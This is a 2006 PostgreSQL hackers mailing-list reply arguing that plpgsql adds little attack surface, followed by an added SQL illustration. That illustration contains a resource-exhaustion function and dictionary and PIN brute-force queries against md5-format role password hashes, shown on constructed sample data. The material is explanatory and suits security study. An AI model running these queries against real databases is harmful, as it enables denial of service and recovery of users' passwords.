From: | Andrew - Supernews <andrew+nonews(at)supernews(dot)com> |
---|---|
To: | pgsql-hackers(at)postgresql(dot)org |
Subject: | Re: plpgsql by default (was: Re: Remote administration contrib module) |
Date: | 2006-04-11 03:26:17 |
Message-ID: | slrne3m8eo.2as.andrew+nonews@atlantis.supernews.net |
Lists: | pgsql-hackers |
On 2006-04-11, Tom Lane <tgl(at)sss(dot)pgh(dot)pa(dot)us> wrote:
> Andrew - Supernews <andrew+nonews(at)supernews(dot)com> writes:
>> On 2006-04-10, Bruce Momjian <pgman(at)candle(dot)pha(dot)pa(dot)us> wrote:
>>>> [ security ]
>>> It actually is the reason I have heard.
>
>> And it was duly debunked.
>
> That is the reasoning, and personally I agree with it. You don't leave
> sharp objects sitting around if you have no need to have them out.
> The availability of plpgsql or other PLs makes for a significant jump
> in what a bad guy can do if he gets access to the database,
Example please.
Last time this was discussed, the claimed examples were things like
running infinite loops as a resource exhaustion attack, which is pretty
trivial to do in plain SQL functions or even in plain SQL without functions,
and running things like brute-force attacks on password hashes (which also
isn't hard using plain SQL functions).
--
Andrew, Supernews
http://www.supernews.com - individual and corporate NNTP services
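An added illustration of the two claims in the post above (resource exhaustion and hash brute-forcing in plain SQL, with no procedural language loaded). This is example code written for this page, not code from the thread or from PostgreSQL itself. It runs against a constructed temp table, `sample_authid`, that imitates the historical `pg_authid.rolpassword` layout (`'md5' || md5(password || rolname)`); on a real server the same queries would read `pg_authid`, which only a superuser can select from, so the brute-force half of the argument already presumes superuser access. The `burn`, `crack_md5` and `wordlist` names and all passwords are made up for the example. Modern servers storing SCRAM-SHA-256 verifiers are not attackable with the built-in `md5()` alone; the resource-exhaustion function is version-independent.

```sql
-- Added example, not part of the original thread. Everything below is
-- LANGUAGE sql or plain SELECTs: no plpgsql is used anywhere.

-- Constructed stand-in for pg_authid. Real servers: only superusers can
-- read pg_authid.rolpassword.
CREATE TEMP TABLE sample_authid (rolname text, rolpassword text);
INSERT INTO sample_authid VALUES
  ('alice', 'md5' || md5('secret1' || 'alice')),   -- constructed
  ('bob',   'md5' || md5('hunter2' || 'bob')),     -- constructed
  ('carol', 'md5' || md5('0042'    || 'carol'));   -- constructed 4-digit PIN

-- Constructed wordlist for the dictionary attack.
CREATE TEMP TABLE wordlist (word text);
INSERT INTO wordlist VALUES ('password'), ('secret1'), ('letmein'), ('hunter2');

-- 1. Resource exhaustion from a plain SQL function. No loop construct is
--    needed: a cross join of two generate_series() calls produces n*n rows
--    and count() forces the whole thing to be evaluated.
CREATE FUNCTION burn(n int) RETURNS bigint LANGUAGE sql AS $$
  SELECT count(*)
  FROM generate_series(1, $1) AS a,
       generate_series(1, $1) AS b;
$$;
-- SELECT burn(100000);   -- 10^10 rows; occupies a backend effectively forever

-- 2. Dictionary attack on md5-format hashes, again as a plain SQL function.
--    $1 = rolname, $2 = rolpassword (hash format: 'md5' || md5(pw || rolname)).
CREATE FUNCTION crack_md5(rolname text, rolpassword text)
RETURNS text LANGUAGE sql STABLE AS $$
  SELECT w.word
  FROM wordlist AS w
  WHERE 'md5' || md5(w.word || $1) = $2
  LIMIT 1;
$$;

SELECT a.rolname, crack_md5(a.rolname, a.rolpassword) AS recovered
FROM sample_authid AS a;
-- expected: alice -> secret1, bob -> hunter2, carol -> NULL (not in wordlist)

-- 3. Exhaustive brute force without any wordlist: enumerate every 4-digit
--    PIN with generate_series() and hash each candidate against every role.
SELECT a.rolname, lpad(n::text, 4, '0') AS pin
FROM sample_authid AS a,
     generate_series(0, 9999) AS n
WHERE 'md5' || md5(lpad(n::text, 4, '0') || a.rolname) = a.rolpassword;
-- expected: carol -> 0042
```

The point the example makes is the one the post makes: neither attack depends on a procedural language, since `generate_series()` and a cross join give you unbounded iteration and `md5()` gives you the hash function, so removing plpgsql changes nothing for an attacker who already holds the privileges these queries need.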